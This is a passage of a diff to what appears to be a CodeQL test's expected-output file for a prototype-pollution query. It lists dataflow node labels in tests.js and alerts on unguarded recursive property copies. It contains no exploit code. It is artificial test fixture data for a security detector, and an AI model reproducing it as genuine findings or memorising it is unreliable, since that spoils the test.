src[key] | -| tests.js:68:24:68:26 | src | semmle.label | src | -| tests.js:68:24:68:31 | src[key] | semmle.label | src[key] | -| tests.js:77:27:77:29 | src | semmle.label | src | -| tests.js:81:39:81:41 | src | semmle.label | src | -| tests.js:81:39:81:46 | src[key] | semmle.label | src[key] | -| tests.js:83:28:83:30 | src | semmle.label | src | -| tests.js:83:28:83:35 | src[key] | semmle.label | src[key] | -| tests.js:89:34:89:36 | src | semmle.label | src | -| tests.js:90:14:90:16 | key | semmle.label | key | -| tests.js:94:42:94:44 | src | semmle.label | src | -| tests.js:94:42:94:49 | src[key] | semmle.label | src[key] | -| tests.js:96:17:96:19 | key | semmle.label | key | -| tests.js:96:24:96:26 | src | semmle.label | src | -| tests.js:96:24:96:31 | src[key] | semmle.label | src[key] | -| tests.js:96:28:96:30 | key | semmle.label | key | -| tests.js:101:32:101:34 | dst | semmle.label | dst | -| tests.js:101:37:101:39 | src | semmle.label | src | -| tests.js:102:14:102:16 | key | semmle.label | key | -| tests.js:107:35:107:37 | dst | semmle.label | dst | -| tests.js:107:35:107:42 | dst[key] | semmle.label | dst[key] | -| tests.js:107:39:107:41 | key | semmle.label | key | -| tests.js:107:45:107:47 | src | semmle.label | src | -| tests.js:107:45:107:52 | src[key] | semmle.label | src[key] | -| tests.js:107:49:107:51 | key | semmle.label | key | -| tests.js:109:13:109:15 | dst | semmle.label | dst | -| tests.js:109:17:109:19 | key | semmle.label | key | -| tests.js:109:24:109:26 | src | semmle.label | src | -| tests.js:109:24:109:31 | src[key] | semmle.label | src[key] | -| tests.js:109:28:109:30 | key | semmle.label | key | -| tests.js:116:41:116:43 | src | semmle.label | src | -| tests.js:117:14:117:16 | key | semmle.label | key | -| tests.js:119:49:119:51 | src | semmle.label | src | -| tests.js:119:49:119:56 | src[key] | semmle.label | src[key] | -| tests.js:121:17:121:19 | key | semmle.label | key | -| tests.js:121:24:121:26 | src | semmle.label | src | -| tests.js:121:24:121:31 | src[key] | semmle.label | src[key] | -| tests.js:121:28:121:30 | key | semmle.label | key | -| tests.js:149:31:149:33 | dst | semmle.label | dst | -| tests.js:149:36:149:38 | src | semmle.label | src | -| tests.js:150:14:150:16 | key | semmle.label | key | -| tests.js:152:22:152:24 | dst | semmle.label | dst | -| tests.js:152:27:152:29 | src | semmle.label | src | -| tests.js:152:32:152:34 | key | semmle.label | key | -| tests.js:154:13:154:15 | dst | semmle.label | dst | -| tests.js:154:17:154:19 | key | semmle.label | key | -| tests.js:154:24:154:26 | src | semmle.label | src | -| tests.js:154:24:154:31 | src[key] | semmle.label | src[key] | -| tests.js:154:28:154:30 | key | semmle.label | key | -| tests.js:159:36:159:38 | dst | semmle.label | dst | -| tests.js:159:41:159:43 | src | semmle.label | src | -| tests.js:160:26:160:28 | dst | semmle.label | dst | -| tests.js:160:31:160:33 | src | semmle.label | src | -| tests.js:160:37:160:39 | dst | semmle.label | dst | -| tests.js:160:42:160:44 | src | semmle.label | src | -| tests.js:160:47:160:49 | key | semmle.label | key | -| tests.js:161:35:161:37 | dst | semmle.label | dst | -| tests.js:161:35:161:42 | dst[key] | semmle.label | dst[key] | -| tests.js:161:39:161:41 | key | semmle.label | key | -| tests.js:161:45:161:47 | src | semmle.label | src | -| tests.js:161:45:161:52 | src[key] | semmle.label | src[key] | -| tests.js:161:49:161:51 | key | semmle.label | key | -| tests.js:165:37:165:39 | src | semmle.label | src | -| tests.js:166:14:166:16 | key | semmle.label | key | -| tests.js:169:45:169:47 | src | semmle.label | src | -| tests.js:169:45:169:52 | src[key] | semmle.label | src[key] | -| tests.js:169:49:169:51 | key | semmle.label | key | -| tests.js:171:17:171:19 | key | semmle.label | key | -| tests.js:171:24:171:26 | src | semmle.label | src | -| tests.js:171:24:171:31 | src[key] | semmle.label | src[key] | -| tests.js:171:28:171:30 | key | semmle.label | key | -| tests.js:178:33:178:35 | src | semmle.label | src | -| tests.js:182:41:182:43 | src | semmle.label | src | -| tests.js:182:41:182:48 | src[key] | semmle.label | src[key] | -| tests.js:184:24:184:26 | src | semmle.label | src | -| tests.js:184:24:184:31 | src[key] | semmle.label | src[key] | -| tests.js:189:32:189:34 | dst | semmle.label | dst | -| tests.js:189:37:189:39 | src | semmle.label | src | -| tests.js:192:13:192:25 | key | semmle.label | key | -| tests.js:192:19:192:25 | keys[i] | semmle.label | keys[i] | -| tests.js:194:35:194:37 | dst | semmle.label | dst | -| tests.js:194:35:194:42 | dst[key] | semmle.label | dst[key] | -| tests.js:194:39:194:41 | key | semmle.label | key | -| tests.js:194:45:194:47 | src | semmle.label | src | -| tests.js:194:45:194:52 | src[key] | semmle.label | src[key] | -| tests.js:194:49:194:51 | key | semmle.label | key | -| tests.js:196:13:196:15 | dst | semmle.label | dst | -| tests.js:196:17:196:19 | key | semmle.label | key | -| tests.js:196:24:196:26 | src | semmle.label | src | -| tests.js:196:24:196:31 | src[key] | semmle.label | src[key] | -| tests.js:196:28:196:30 | key | semmle.label | key | -| tests.js:201:39:201:41 | dst | semmle.label | dst | -| tests.js:201:44:201:46 | src | semmle.label | src | -| tests.js:206:42:206:44 | dst | semmle.label | dst | -| tests.js:206:42:206:53 | dst[keys[i]] | semmle.label | dst[keys[i]] | -| tests.js:206:46:206:52 | keys[i] | semmle.label | keys[i] | -| tests.js:206:56:206:58 | src | semmle.label | src | -| tests.js:206:56:206:67 | src[keys[i]] | semmle.label | src[keys[i]] | -| tests.js:206:60:206:66 | keys[i] | semmle.label | keys[i] | -| tests.js:208:13:208:15 | dst | semmle.label | dst | -| tests.js:208:17:208:23 | keys[i] | semmle.label | keys[i] | -| tests.js:208:28:208:30 | src | semmle.label | src | -| tests.js:208:28:208:39 | src[keys[i]] | semmle.label | src[keys[i]] | -| tests.js:208:32:208:38 | keys[i] | semmle.label | keys[i] | -| tests.js:213:23:213:26 | key1 | semmle.label | key1 | -| tests.js:213:29:213:32 | key2 | semmle.label | key2 | -| tests.js:213:35:213:39 | value | semmle.label | value | -| tests.js:217:5:217:13 | map[key1] | semmle.label | map[key1] | -| tests.js:217:9:217:12 | key1 | semmle.label | key1 | -| tests.js:217:15:217:18 | key2 | semmle.label | key2 | -| tests.js:217:23:217:27 | value | semmle.label | value | -| tests.js:223:14:223:16 | key | semmle.label | key | -| tests.js:224:23:224:25 | key | semmle.label | key | -| tests.js:224:33:224:41 | data[key] | semmle.label | data[key] | -| tests.js:224:38:224:40 | key | semmle.label | key | -| tests.js:225:28:225:30 | key | semmle.label | key | -| tests.js:225:33:225:41 | data[key] | semmle.label | data[key] | -| tests.js:225:38:225:40 | key | semmle.label | key | -| tests.js:229:26:229:29 | key1 | semmle.label | key1 | -| tests.js:229:32:229:35 | key2 | semmle.label | key2 | -| tests.js:229:38:229:42 | value | semmle.label | value | -| tests.js:233:5:233:13 | map[key1] | semmle.label | map[key1] | -| tests.js:233:9:233:12 | key1 | semmle.label | key1 | -| tests.js:233:15:233:18 | key2 | semmle.label | key2 | -| tests.js:233:23:233:27 | value | semmle.label | value | -| tests.js:238:14:238:16 | key | semmle.label | key | -| tests.js:239:24:239:26 | key | semmle.label | key | -| tests.js:239:34:239:42 | data[key] | semmle.label | data[key] | -| tests.js:239:39:239:41 | key | semmle.label | key | -| tests.js:240:31:240:33 | key | semmle.label | key | -| tests.js:240:36:240:44 | data[key] | semmle.label | data[key] | -| tests.js:240:41:240:43 | key | semmle.label | key | -| tests.js:263:27:263:29 | dst | semmle.label | dst | -| tests.js:265:13:265:26 | key | semmle.label | key | -| tests.js:265:19:265:26 | entry[0] | semmle.label | entry[0] | -| tests.js:266:13:266:28 | value | semmle.label | value | -| tests.js:266:21:266:28 | entry[1] | semmle.label | entry[1] | -| tests.js:268:30:268:32 | dst | semmle.label | dst | -| tests.js:268:30:268:37 | dst[key] | semmle.label | dst[key] | -| tests.js:268:34:268:36 | key | semmle.label | key | -| tests.js:270:13:270:15 | dst | semmle.label | dst | -| tests.js:270:17:270:19 | key | semmle.label | key | -| tests.js:270:24:270:28 | value | semmle.label | value | -| tests.js:275:27:275:29 | dst | semmle.label | dst | -| tests.js:275:32:275:34 | src | semmle.label | src | -| tests.js:276:21:276:23 | src | semmle.label | src | -| tests.js:276:34:276:36 | key | semmle.label | key | -| tests.js:278:30:278:32 | dst | semmle.label | dst | -| tests.js:278:30:278:37 | dst[key] | semmle.label | dst[key] | -| tests.js:278:34:278:36 | key | semmle.label | key | -| tests.js:278:40:278:42 | src | semmle.label | src | -| tests.js:278:40:278:47 | src[key] | semmle.label | src[key] | -| tests.js:278:44:278:46 | key | semmle.label | key | -| tests.js:280:13:280:15 | dst | semmle.label | dst | -| tests.js:280:17:280:19 | key | semmle.label | key | -| tests.js:280:24:280:26 | src | semmle.label | src | -| tests.js:280:24:280:31 | src[key] | semmle.label | src[key] | -| tests.js:280:28:280:30 | key | semmle.label | key | -| tests.js:301:27:301:29 | dst | semmle.label | dst | -| tests.js:301:32:301:34 | src | semmle.label | src | -| tests.js:302:14:302:16 | key | semmle.label | key | -| tests.js:304:17:304:32 | value | semmle.label | value | -| tests.js:304:17:304:32 | value | semmle.label | value | -| tests.js:304:17:304:32 | value | semmle.label | value | -| tests.js:304:25:304:27 | src | semmle.label | src | -| tests.js:304:25:304:32 | src[key] | semmle.label | src[key] | -| tests.js:304:25:304:32 | src[key] | semmle.label | src[key] | -| tests.js:304:25:304:32 | src[key] | semmle.label | src[key] | -| tests.js:304:29:304:31 | key | semmle.label | key | -| tests.js:306:34:306:36 | dst | semmle.label | dst | -| tests.js:306:34:306:41 | dst[key] | semmle.label | dst[key] | -| tests.js:306:38:306:40 | key | semmle.label | key | -| tests.js:306:44:306:48 | value | semmle.label | value | -| tests.js:308:17:308:19 | dst | semmle.label | dst | -| tests.js:308:21:308:23 | key | semmle.label | key | -| tests.js:308:28:308:32 | value | semmle.label | value | -| tests.js:314:31:314:33 | dst | semmle.label | dst | -| tests.js:314:36:314:38 | src | semmle.label | src | -| tests.js:315:14:315:16 | key | semmle.label | key | -| tests.js:318:17:318:32 | value | semmle.label | value | -| tests.js:318:17:318:32 | value | semmle.label | value | -| tests.js:318:17:318:32 | value | semmle.label | value | -| tests.js:318:25:318:27 | src | semmle.label | src | -| tests.js:318:25:318:32 | src[key] | semmle.label | src[key] | -| tests.js:318:25:318:32 | src[key] | semmle.label | src[key] | -| tests.js:318:25:318:32 | src[key] | semmle.label | src[key] | -| tests.js:318:29:318:31 | key | semmle.label | key | -| tests.js:320:38:320:40 | dst | semmle.label | dst | -| tests.js:320:38:320:45 | dst[key] | semmle.label | dst[key] | -| tests.js:320:42:320:44 | key | semmle.label | key | -| tests.js:320:48:320:52 | value | semmle.label | value | -| tests.js:322:17:322:19 | dst | semmle.label | dst | -| tests.js:322:21:322:23 | key | semmle.label | key | -| tests.js:322:28:322:32 | value | semmle.label | value | -| tests.js:328:25:328:27 | dst | semmle.label | dst | -| tests.js:328:30:328:32 | src | semmle.label | src | -| tests.js:329:14:329:16 | key | semmle.label | key | -| tests.js:336:32:336:34 | dst | semmle.label | dst | -| tests.js:336:32:336:39 | dst[key] | semmle.label | dst[key] | -| tests.js:336:36:336:38 | key | semmle.label | key | -| tests.js:336:42:336:44 | src | semmle.label | src | -| tests.js:336:42:336:49 | src[key] | semmle.label | src[key] | -| tests.js:336:46:336:48 | key | semmle.label | key | -| tests.js:338:17:338:19 | dst | semmle.label | dst | -| tests.js:338:21:338:23 | key | semmle.label | key | -| tests.js:338:28:338:30 | src | semmle.label | src | -| tests.js:338:28:338:35 | src[key] | semmle.label | src[key] | -| tests.js:338:32:338:34 | key | semmle.label | key | -| tests.js:348:32:348:37 | target | semmle.label | target | -| tests.js:348:40:348:45 | source | semmle.label | source | -| tests.js:349:26:349:31 | target | semmle.label | target | -| tests.js:349:54:349:59 | source | semmle.label | source | -| tests.js:350:21:350:26 | source | semmle.label | source | -| tests.js:350:37:350:39 | key | semmle.label | key | -| tests.js:355:17:355:22 | target | semmle.label | target | -| tests.js:355:24:355:26 | key | semmle.label | key | -| tests.js:355:31:355:86 | mergePl ... ptions) | semmle.label | mergePl ... ptions) | -| tests.js:355:53:355:58 | target | semmle.label | target | -| tests.js:355:53:355:63 | target[key] | semmle.label | target[key] | -| tests.js:355:60:355:62 | key | semmle.label | key | -| tests.js:355:66:355:71 | source | semmle.label | source | -| tests.js:355:66:355:76 | source[key] | semmle.label | source[key] | -| tests.js:357:17:357:22 | target | semmle.label | target | -| tests.js:357:24:357:26 | key | semmle.label | key | -| tests.js:357:31:357:36 | source | semmle.label | source | -| tests.js:357:31:357:41 | source[key] | semmle.label | source[key] | -| tests.js:357:38:357:40 | key | semmle.label | key | -| tests.js:361:12:361:17 | target | semmle.label | target | -| tests.js:364:41:364:46 | target | semmle.label | target | -| tests.js:364:49:364:54 | source | semmle.label | source | -| tests.js:366:18:366:20 | key | semmle.label | key | -| tests.js:371:24:371:26 | key | semmle.label | key | -| tests.js:371:31:371:95 | mergePl ... ptions) | semmle.label | mergePl ... ptions) | -| tests.js:371:62:371:72 | target[key] | semmle.label | target[key] | -| tests.js:371:69:371:71 | key | semmle.label | key | -| tests.js:371:75:371:80 | source | semmle.label | source | -| tests.js:371:75:371:85 | source[key] | semmle.label | source[key] | -| tests.js:373:24:373:26 | key | semmle.label | key | -| tests.js:373:31:373:36 | source | semmle.label | source | -| tests.js:373:31:373:41 | source[key] | semmle.label | source[key] | -| tests.js:373:38:373:40 | key | semmle.label | key | -| tests.js:377:12:377:17 | target | semmle.label | target | -| tests.js:380:22:380:24 | obj | semmle.label | obj | -| tests.js:380:27:380:34 | callback [dst] | semmle.label | callback [dst] | -| tests.js:380:27:380:34 | callback [dst] | semmle.label | callback [dst] | -| tests.js:380:27:380:34 | callback [dst] | semmle.label | callback [dst] | -| tests.js:380:27:380:34 | callback [dst] | semmle.label | callback [dst] | -| tests.js:380:27:380:34 | callback [src] | semmle.label | callback [src] | -| tests.js:381:14:381:16 | key | semmle.label | key | -| tests.js:383:13:383:20 | callback [dst] | semmle.label | callback [dst] | -| tests.js:383:13:383:20 | callback [dst] | semmle.label | callback [dst] | -| tests.js:383:13:383:20 | callback [dst] | semmle.label | callback [dst] | -| tests.js:383:13:383:20 | callback [dst] | semmle.label | callback [dst] | -| tests.js:383:13:383:20 | callback [src] | semmle.label | callback [src] | -| tests.js:383:22:383:24 | key | semmle.label | key | -| tests.js:383:27:383:29 | obj | semmle.label | obj | -| tests.js:383:27:383:34 | obj[key] | semmle.label | obj[key] | -| tests.js:383:31:383:33 | key | semmle.label | key | -| tests.js:388:29:388:31 | dst | semmle.label | dst | -| tests.js:388:29:388:31 | dst | semmle.label | dst | -| tests.js:388:34:388:36 | src | semmle.label | src | -| tests.js:389:17:389:19 | src | semmle.label | src | -| tests.js:389:22:389:24 | key | semmle.label | key | -| tests.js:391:32:391:34 | dst | semmle.label | dst | -| tests.js:391:32:391:34 | dst | semmle.label | dst | -| tests.js:391:32:391:39 | dst[key] | semmle.label | dst[key] | -| tests.js:391:32:391:39 | dst[key] | semmle.label | dst[key] | -| tests.js:391:36:391:38 | key | semmle.label | key | -| tests.js:391:42:391:44 | src | semmle.label | src | -| tests.js:391:42:391:49 | src[key] | semmle.label | src[key] | -| tests.js:391:46:391:48 | key | semmle.label | key | -| tests.js:393:13:393:15 | dst | semmle.label | dst | -| tests.js:393:17:393:19 | key | semmle.label | key | -| tests.js:393:24:393:26 | src | semmle.label | src | -| tests.js:393:24:393:31 | src[key] | semmle.label | src[key] | -| tests.js:393:28:393:30 | key | semmle.label | key | -| tests.js:398:30:398:32 | dst | semmle.label | dst | -| tests.js:398:30:398:32 | dst | semmle.label | dst | -| tests.js:398:35:398:37 | src | semmle.label | src | -| tests.js:399:17:399:19 | src | semmle.label | src | -| tests.js:399:23:399:25 | key | semmle.label | key | -| tests.js:399:28:399:32 | value | semmle.label | value | -| tests.js:401:33:401:35 | dst | semmle.label | dst | -| tests.js:401:33:401:35 | dst | semmle.label | dst | -| tests.js:401:33:401:40 | dst[key] | semmle.label | dst[key] | -| tests.js:401:33:401:40 | dst[key] | semmle.label | dst[key] | -| tests.js:401:37:401:39 | key | semmle.label | key | -| tests.js:401:43:401:47 | value | semmle.label | value | -| tests.js:403:13:403:15 | dst | semmle.label | dst | -| tests.js:403:17:403:19 | key | semmle.label | key | -| tests.js:403:24:403:28 | value | semmle.label | value | -| tests.js:408:22:408:24 | obj | semmle.label | obj | -| tests.js:408:27:408:29 | key | semmle.label | key | -| tests.js:409:12:409:14 | obj | semmle.label | obj | -| tests.js:409:12:409:19 | obj[key] | semmle.label | obj[key] | -| tests.js:409:16:409:18 | key | semmle.label | key | -| tests.js:412:31:412:33 | dst | semmle.label | dst | -| tests.js:412:36:412:38 | src | semmle.label | src | -| tests.js:413:14:413:16 | key | semmle.label | key | -| tests.js:414:13:414:41 | value | semmle.label | value | -| tests.js:414:21:414:41 | wrapped ... c, key) | semmle.label | wrapped ... c, key) | -| tests.js:414:33:414:35 | src | semmle.label | src | -| tests.js:414:38:414:40 | key | semmle.label | key | -| tests.js:415:13:415:42 | target | semmle.label | target | -| tests.js:415:22:415:42 | wrapped ... t, key) | semmle.label | wrapped ... t, key) | -| tests.js:415:34:415:36 | dst | semmle.label | dst | -| tests.js:415:39:415:41 | key | semmle.label | key | -| tests.js:417:34:417:39 | target | semmle.label | target | -| tests.js:417:42:417:46 | value | semmle.label | value | -| tests.js:419:13:419:15 | dst | semmle.label | dst | -| tests.js:419:17:419:19 | key | semmle.label | key | -| tests.js:419:24:419:28 | value | semmle.label | value | -| tests.js:424:25:424:27 | obj | semmle.label | obj | -| tests.js:424:30:424:32 | key | semmle.label | key | -| tests.js:426:12:426:14 | obj | semmle.label | obj | -| tests.js:426:12:426:19 | obj[key] | semmle.label | obj[key] | -| tests.js:426:16:426:18 | key | semmle.label | key | -| tests.js:429:34:429:36 | dst | semmle.label | dst | -| tests.js:429:39:429:41 | src | semmle.label | src | -| tests.js:430:14:430:16 | key | semmle.label | key | -| tests.js:431:13:431:44 | value | semmle.label | value | -| tests.js:431:21:431:44 | almostS ... c, key) | semmle.label | almostS ... c, key) | -| tests.js:431:36:431:38 | src | semmle.label | src | -| tests.js:431:41:431:43 | key | semmle.label | key | -| tests.js:432:13:432:45 | target | semmle.label | target | -| tests.js:432:22:432:45 | almostS ... t, key) | semmle.label | almostS ... t, key) | -| tests.js:432:37:432:39 | dst | semmle.label | dst | -| tests.js:432:42:432:44 | key | semmle.label | key | -| tests.js:434:37:434:42 | target | semmle.label | target | -| tests.js:434:45:434:49 | value | semmle.label | value | -| tests.js:436:13:436:15 | dst | semmle.label | dst | -| tests.js:436:17:436:19 | key | semmle.label | key | -| tests.js:436:24:436:28 | value | semmle.label | value | -| tests.js:441:19:441:21 | obj | semmle.label | obj | -| tests.js:443:12:443:14 | obj | semmle.label | obj | -| tests.js:443:12:443:19 | obj[key] | semmle.label | obj[key] | -| tests.js:446:33:446:35 | src | semmle.label | src | -| tests.js:447:14:447:16 | key | semmle.label | key | -| tests.js:448:13:448:38 | value | semmle.label | value | -| tests.js:448:21:448:38 | safeRead(src, key) | semmle.label | safeRead(src, key) | -| tests.js:448:30:448:32 | src | semmle.label | src | -| tests.js:451:39:451:43 | value | semmle.label | value | -| tests.js:453:17:453:19 | key | semmle.label | key | -| tests.js:453:24:453:28 | value | semmle.label | value | -| tests.js:458:26:458:28 | dst | semmle.label | dst | -| tests.js:458:31:458:33 | src | semmle.label | src | -| tests.js:460:12:460:14 | src | semmle.label | src | -| tests.js:460:18:460:22 | value | semmle.label | value | -| tests.js:460:25:460:27 | key | semmle.label | key | -| tests.js:462:29:462:31 | dst | semmle.label | dst | -| tests.js:462:29:462:36 | dst[key] | semmle.label | dst[key] | -| tests.js:462:33:462:35 | key | semmle.label | key | -| tests.js:462:39:462:41 | src | semmle.label | src | -| tests.js:462:39:462:46 | src[key] | semmle.label | src[key] | -| tests.js:462:43:462:45 | key | semmle.label | key | -| tests.js:465:30:465:32 | dst | semmle.label | dst | -| tests.js:465:34:465:36 | key | semmle.label | key | -| tests.js:465:41:465:43 | src | semmle.label | src | -| tests.js:465:41:465:48 | src[key] | semmle.label | src[key] | -| tests.js:465:45:465:47 | key | semmle.label | key | -| tests.js:466:30:466:32 | dst | semmle.label | dst | -| tests.js:466:34:466:36 | key | semmle.label | key | -| tests.js:466:41:466:46 | o[key] | semmle.label | o[key] | -| tests.js:466:43:466:45 | key | semmle.label | key | -| tests.js:467:30:467:32 | dst | semmle.label | dst | -| tests.js:467:34:467:36 | key | semmle.label | key | -| tests.js:467:41:467:45 | value | semmle.label | value | -| tests.js:472:38:472:40 | dst | semmle.label | dst | -| tests.js:473:18:473:22 | value | semmle.label | value | -| tests.js:473:25:473:27 | key | semmle.label | key | -| tests.js:475:41:475:43 | dst | semmle.label | dst | -| tests.js:475:41:475:48 | dst[key] | semmle.label | dst[key] | -| tests.js:475:45:475:47 | key | semmle.label | key | -| tests.js:477:13:477:15 | dst | semmle.label | dst | -| tests.js:477:17:477:19 | key | semmle.label | key | -| tests.js:477:24:477:28 | value | semmle.label | value | -| tests.js:483:26:483:28 | dst | semmle.label | dst | -| tests.js:483:31:483:33 | src | semmle.label | src | -| tests.js:483:31:483:33 | src | semmle.label | src | -| tests.js:484:14:484:16 | key | semmle.label | key | -| tests.js:487:29:487:31 | dst | semmle.label | dst | -| tests.js:487:29:487:36 | dst[key] | semmle.label | dst[key] | -| tests.js:487:33:487:35 | key | semmle.label | key | -| tests.js:487:39:487:41 | src | semmle.label | src | -| tests.js:487:39:487:46 | src[key] | semmle.label | src[key] | -| tests.js:487:39:487:46 | src[key] | semmle.label | src[key] | -| tests.js:487:39:487:46 | src[key] | semmle.label | src[key] | -| tests.js:487:43:487:45 | key | semmle.label | key | -| tests.js:489:13:489:15 | dst | semmle.label | dst | -| tests.js:489:17:489:19 | key | semmle.label | key | -| tests.js:489:24:489:26 | src | semmle.label | src | -| tests.js:489:24:489:31 | src[key] | semmle.label | src[key] | -| tests.js:489:28:489:30 | key | semmle.label | key | -| tests.js:494:32:494:34 | src | semmle.label | src | -| tests.js:495:14:495:16 | key | semmle.label | key | -| tests.js:498:13:498:28 | value | semmle.label | value | -| tests.js:498:13:498:28 | value | semmle.label | value | -| tests.js:498:13:498:28 | value | semmle.label | value | -| tests.js:498:21:498:23 | src | semmle.label | src | -| tests.js:498:21:498:28 | src[key] | semmle.label | src[key] | -| tests.js:498:21:498:28 | src[key] | semmle.label | src[key] | -| tests.js:498:21:498:28 | src[key] | semmle.label | src[key] | -| tests.js:498:25:498:27 | key | semmle.label | key | -| tests.js:500:38:500:42 | value | semmle.label | value | -| tests.js:502:17:502:19 | key | semmle.label | key | -| tests.js:502:24:502:28 | value | semmle.label | value | -| tests.js:508:30:508:32 | dst | semmle.label | dst | -| tests.js:508:35:508:37 | src | semmle.label | src | -| tests.js:511:13:511:25 | key | semmle.label | key | -| tests.js:511:19:511:25 | keys[i] | semmle.label | keys[i] | -| tests.js:513:33:513:35 | dst | semmle.label | dst | -| tests.js:513:33:513:40 | dst[key] | semmle.label | dst[key] | -| tests.js:513:37:513:39 | key | semmle.label | key | -| tests.js:513:43:513:45 | src | semmle.label | src | -| tests.js:513:43:513:50 | src[key] | semmle.label | src[key] | -| tests.js:513:47:513:49 | key | semmle.label | key | -| tests.js:516:32:516:34 | src | semmle.label | src | -| tests.js:516:32:516:39 | src[key] | semmle.label | src[key] | -| tests.js:516:36:516:38 | key | semmle.label | key | -| tests.js:517:35:517:37 | dst | semmle.label | dst | -| tests.js:517:40:517:42 | key | semmle.label | key | -| tests.js:522:35:522:38 | args [0] | semmle.label | args [0] | -| tests.js:522:35:522:38 | args [1] | semmle.label | args [1] | -| tests.js:523:11:523:23 | dst | semmle.label | dst | -| tests.js:523:17:523:20 | args [0] | semmle.label | args [0] | -| tests.js:523:17:523:23 | args[0] | semmle.label | args[0] | -| tests.js:524:11:524:23 | src | semmle.label | src | -| tests.js:524:17:524:20 | args [1] | semmle.label | args [1] | -| tests.js:524:17:524:23 | args[1] | semmle.label | args[1] | -| tests.js:525:14:525:16 | key | semmle.label | key | -| tests.js:527:35:527:37 | dst | semmle.label | dst | -| tests.js:527:35:527:42 | dst[key] | semmle.label | dst[key] | -| tests.js:527:39:527:41 | key | semmle.label | key | -| tests.js:527:45:527:47 | src | semmle.label | src | -| tests.js:527:45:527:52 | src[key] | semmle.label | src[key] | -| tests.js:527:49:527:51 | key | semmle.label | key | -| tests.js:529:13:529:15 | dst | semmle.label | dst | -| tests.js:529:17:529:19 | key | semmle.label | key | -| tests.js:529:24:529:26 | src | semmle.label | src | -| tests.js:529:24:529:31 | src[key] | semmle.label | src[key] | -| tests.js:529:28:529:30 | key | semmle.label | key | -| tests.js:534:31:534:33 | obj | semmle.label | obj | -| tests.js:534:36:534:43 | callback [dst] | semmle.label | callback [dst] | -| tests.js:538:9:538:16 | callback [dst] | semmle.label | callback [dst] | -| tests.js:538:18:538:24 | keys[i] | semmle.label | keys[i] | -| tests.js:538:27:538:29 | obj | semmle.label | obj | -| tests.js:538:27:538:38 | obj[keys[i]] | semmle.label | obj[keys[i]] | -| tests.js:538:31:538:37 | keys[i] | semmle.label | keys[i] | -| tests.js:542:30:542:32 | dst | semmle.label | dst | -| tests.js:542:35:542:37 | src | semmle.label | src | -| tests.js:543:26:543:28 | src | semmle.label | src | -| tests.js:543:32:543:34 | key | semmle.label | key | -| tests.js:543:37:543:41 | value | semmle.label | value | -| tests.js:545:33:545:35 | dst | semmle.label | dst | -| tests.js:545:33:545:40 | dst[key] | semmle.label | dst[key] | -| tests.js:545:37:545:39 | key | semmle.label | key | -| tests.js:545:43:545:47 | value | semmle.label | value | -| tests.js:547:13:547:15 | dst | semmle.label | dst | -| tests.js:547:17:547:19 | key | semmle.label | key | -| tests.js:547:24:547:28 | value | semmle.label | value | -| tests.js:552:35:552:37 | src | semmle.label | src | -| tests.js:553:14:553:16 | key | semmle.label | key | -| tests.js:557:43:557:45 | src | semmle.label | src | -| tests.js:557:43:557:50 | src[key] | semmle.label | src[key] | -| tests.js:559:17:559:19 | key | semmle.label | key | -| tests.js:559:24:559:26 | src | semmle.label | src | -| tests.js:559:24:559:31 | src[key] | semmle.label | src[key] | -| tests.js:559:28:559:30 | key | semmle.label | key | -| tests.js:564:35:564:37 | src | semmle.label | src | -| tests.js:565:14:565:16 | key | semmle.label | key | -| tests.js:569:43:569:45 | src | semmle.label | src | -| tests.js:569:43:569:50 | src[key] | semmle.label | src[key] | -| tests.js:571:17:571:19 | key | semmle.label | key | -| tests.js:571:24:571:26 | src | semmle.label | src | -| tests.js:571:24:571:31 | src[key] | semmle.label | src[key] | -| tests.js:571:28:571:30 | key | semmle.label | key | -| tests.js:576:30:576:32 | src | semmle.label | src | -| tests.js:577:14:577:16 | key | semmle.label | key | -| tests.js:580:38:580:40 | src | semmle.label | src | -| tests.js:580:38:580:45 | src[key] | semmle.label | src[key] | -| tests.js:582:17:582:19 | key | semmle.label | key | -| tests.js:582:24:582:26 | src | semmle.label | src | -| tests.js:582:24:582:31 | src[key] | semmle.label | src[key] | -| tests.js:582:28:582:30 | key | semmle.label | key | -| tests.js:591:25:591:27 | obj | semmle.label | obj | -| tests.js:592:7:592:9 | obj | semmle.label | obj | -| tests.js:592:21:592:23 | obj | semmle.label | obj | -| tests.js:593:10:593:12 | obj | semmle.label | obj | -| tests.js:600:31:600:34 | dest | semmle.label | dest | -| tests.js:600:37:600:42 | source | semmle.label | source | -| tests.js:601:16:601:18 | key | semmle.label | key | -| tests.js:603:34:603:37 | dest | semmle.label | dest | -| tests.js:603:34:603:42 | dest[key] | semmle.label | dest[key] | -| tests.js:603:39:603:41 | key | semmle.label | key | -| tests.js:603:45:603:50 | source | semmle.label | source | -| tests.js:603:45:603:55 | source[key] | semmle.label | source[key] | -| tests.js:603:52:603:54 | key | semmle.label | key | -| tests.js:605:13:605:16 | dest | semmle.label | dest | -| tests.js:605:18:605:20 | key | semmle.label | key | -| tests.js:605:25:605:51 | capture ... e[key]) | semmle.label | capture ... e[key]) | -| tests.js:605:40:605:45 | source | semmle.label | source | -| tests.js:605:40:605:50 | source[key] | semmle.label | source[key] | -| tests.js:605:47:605:49 | key | semmle.label | key | +#select +| examples/PrototypePollutingFunction.js:7:13:7:15 | dst | examples/PrototypePollutingFunction.js:2:14:2:16 | key | examples/PrototypePollutingFunction.js:7:13:7:15 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. | examples/PrototypePollutingFunction.js:2:21:2:23 | src | src | examples/PrototypePollutingFunction.js:7:13:7:15 | dst | dst | +| path-assignment.js:15:13:15:18 | target | path-assignment.js:8:19:8:25 | keys[i] | path-assignment.js:15:13:15:18 | target | The property chain $@ is recursively assigned to $@ without guarding against prototype pollution. | path-assignment.js:8:19:8:25 | keys[i] | here | path-assignment.js:15:13:15:18 | target | target | +| path-assignment.js:44:5:44:10 | target | path-assignment.js:41:19:41:25 | keys[i] | path-assignment.js:44:5:44:10 | target | The property chain $@ is recursively assigned to $@ without guarding against prototype pollution. | path-assignment.js:41:19:41:25 | keys[i] | here | path-assignment.js:44:5:44:10 | target | target | +| path-assignment.js:61:5:61:10 | target | path-assignment.js:58:19:58:25 | keys[i] | path-assignment.js:61:5:61:10 | target | The property chain $@ is recursively assigned to $@ without guarding against prototype pollution. | path-assignment.js:58:19:58:25 | keys[i] | here | path-assignment.js:61:5:61:10 | target | target | +| path-assignment.js:71:5:71:10 | target | path-assignment.js:68:19:68:25 | keys[i] | path-assignment.js:71:5:71:10 | target | The property chain $@ is recursively assigned to $@ without guarding against prototype pollution. | path-assignment.js:68:19:68:25 | keys[i] | here | path-assignment.js:71:5:71:10 | target | target | +| 